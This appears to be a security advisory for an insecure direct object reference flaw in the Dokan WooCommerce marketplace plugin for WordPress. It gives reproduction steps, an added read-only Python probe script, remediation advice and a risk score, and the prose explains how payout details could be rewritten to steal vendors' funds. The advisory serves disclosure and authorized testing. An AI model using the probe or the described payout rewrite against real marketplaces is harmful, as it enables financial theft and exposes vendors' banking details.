Dokan WooCommerce Multivendor Marketplace Plugin Insecure Direct Object Reference Vulnerability

Vulnerability

An Insecure Direct Object Reference (IDOR) vulnerability has been identified in the Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress, affecting all versions up to and including 4.2.4. The flaw is in the '/wp-json/dokan/v1/settings' REST API endpoint, which does not sufficiently validate the user-controlled 'vendor_id' parameter: it never checks that the vendor whose settings are requested belongs to the requesting user. Any authenticated user with customer-level permissions or higher can therefore read or modify other vendors' store settings, including sensitive payment information such as PayPal emails, bank account details, routing numbers, IBANs and SWIFT codes, as well as phone numbers and addresses. An attacker could change a vendor's PayPal email address to one under their own control and collect that vendor's funds during the marketplace payout process.

Impact

Successful exploitation allows unauthorized reading and modification of other vendors' store settings, including payout details and personal contact information. Because payout destinations can be rewritten silently, the practical impact is financial theft: marketplace payouts intended for a vendor are redirected to an attacker-controlled PayPal account or bank account.

Reproduction

To reproduce this vulnerability, an authenticated user holding only customer-level permissions sends a request to the '/wp-json/dokan/v1/settings' endpoint with a 'vendor_id' value that belongs to a different vendor. The endpoint does not verify that the caller owns the referenced vendor, so the other vendor's settings are returned, and a write request against the same endpoint updates them. The request can be issued with a tool such as Postman or with custom code that talks to the WordPress REST API using any authentication method WordPress accepts for REST calls (for example a logged-in cookie with a REST nonce, or an Application Password over HTTP Basic auth). A response containing the other vendor's payment or contact fields confirms the missing ownership check.
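The following Python script is an added example for authorized testing and is not part of the advisory or of the Dokan plugin. It builds the read-only probe described above and classifies the response offline, so the decision logic can be exercised without a live site. Assumptions not stated on the page: 'vendor_id' is passed as a query parameter, authentication uses a WordPress Application Password over HTTP Basic auth, and the JSON keys in the constructed sample response (and the substring heuristic used to spot payment and contact fields) are illustrative rather than Dokan's real schema. Only GET is used; the page does not state which HTTP method performs the modification, so no write request is attempted.

```python
"""Probe /wp-json/dokan/v1/settings for cross-vendor access (added example, not Dokan code).

Assumed (not from the advisory): vendor_id as a query parameter, Application Password
Basic auth, and the key names in the constructed sample response below.
"""
import base64
import json
import urllib.error
import urllib.request
from typing import Any, Iterator
from urllib.parse import urlencode

ENDPOINT = "/wp-json/dokan/v1/settings"

# Substrings that identify the field classes named in the advisory
# (PayPal email, bank account, routing number, IBAN, SWIFT, phone, address).
SENSITIVE_MARKERS = ("paypal", "bank", "routing", "iban", "swift", "phone", "address")


def basic_auth_header(username: str, app_password: str) -> str:
    """HTTP Basic header for a WordPress Application Password (assumed auth method)."""
    token = base64.b64encode(f"{username}:{app_password}".encode()).decode()
    return f"Basic {token}"


def build_probe(base_url: str, vendor_id: int, username: str, app_password: str) -> urllib.request.Request:
    """GET request for another vendor's settings; the server should refuse it."""
    url = f"{base_url.rstrip('/')}{ENDPOINT}?{urlencode({'vendor_id': vendor_id})}"
    headers = {
        "Authorization": basic_auth_header(username, app_password),
        "Accept": "application/json",
    }
    return urllib.request.Request(url, method="GET", headers=headers)


def send_probe(req: urllib.request.Request) -> tuple[int, Any]:
    """Send the request and return (status, parsed JSON), keeping 4xx bodies for inspection."""
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, json.loads(resp.read().decode())
    except urllib.error.HTTPError as err:
        body = err.read().decode(errors="replace")
        try:
            return err.code, json.loads(body)
        except json.JSONDecodeError:
            return err.code, body


def flatten(obj: Any, prefix: str = "") -> Iterator[tuple[str, Any]]:
    """Yield (dotted.key, leaf value) pairs for nested JSON so field names can be matched."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from flatten(value, f"{prefix}.{key}" if prefix else str(key))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from flatten(value, f"{prefix}[{index}]")
    else:
        yield prefix, obj


def sensitive_fields(body: Any) -> dict[str, Any]:
    """Populated fields whose key path mentions a payment or contact marker."""
    return {
        key: value
        for key, value in flatten(body)
        if any(marker in key.lower() for marker in SENSITIVE_MARKERS) and value not in ("", None)
    }


def classify(own_vendor_id: int, requested_vendor_id: int, status: int, body: Any) -> str:
    """Decide what a probe result means.

    'own-data'     - caller asked for its own vendor; says nothing about the bug
    'denied'       - 401/403: ownership check present (expected on 4.2.5+)
    'idor'         - 200 with another vendor's payment/contact fields populated
    'inconclusive' - 200 but nothing sensitive visible, or an unexpected status
    """
    if requested_vendor_id == own_vendor_id:
        return "own-data"
    if status in (401, 403):
        return "denied"
    if status == 200 and sensitive_fields(body):
        return "idor"
    return "inconclusive"


# Constructed sample response for offline testing; key names are assumed, not Dokan's schema.
SAMPLE_OTHER_VENDOR = {
    "store_name": "Example Store",
    "payment": {
        "paypal": {"email": "victim@example.com"},
        "bank": {"ac_number": "000111222", "routing_number": "123456789", "iban": "GB00EXAMPLE", "swift": "EXAMPLEX"},
    },
    "phone": "+1-555-0100",
    "address": {"street_1": "1 Example St", "city": "Springfield"},
}


def run(base_url: str, own_vendor_id: int, target_vendor_id: int, username: str, app_password: str) -> str:
    """End-to-end probe against a live site you are authorized to test."""
    status, body = send_probe(build_probe(base_url, target_vendor_id, username, app_password))
    return classify(own_vendor_id, target_vendor_id, status, body)
```

A 'denied' result for a foreign 'vendor_id' is the expected behaviour after the fix; an 'idor' result on a customer-level account is the finding. Run `run("https://shop.example", own_vendor_id, target_vendor_id, user, app_password)` only against a site you own or are authorized to test.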

Remediation

Users are advised to update the Dokan plugin to version 4.2.5 or later, where this vulnerability has been patched. Because the flaw allows payout details to be changed without the vendor's knowledge, site owners who ran a vulnerable version should also have vendors confirm that their PayPal email and bank account details are still correct and review any recent changes to store settings.

Added: Jan 20, 2026, 5:41 AM
Updated: Jan 20, 2026, 5:41 AM

Vulnerability Rating

Custom Algorithm
spread: 5.2
impact: 5.0
exploitability: 6.0
remediation: 7.7
relevance: 2.2
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.